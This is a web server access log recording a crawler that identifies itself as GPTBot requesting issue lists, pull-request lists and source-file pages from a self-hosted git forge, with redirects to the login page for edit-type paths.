"/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:12:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11273] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:19:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11272] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:19:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 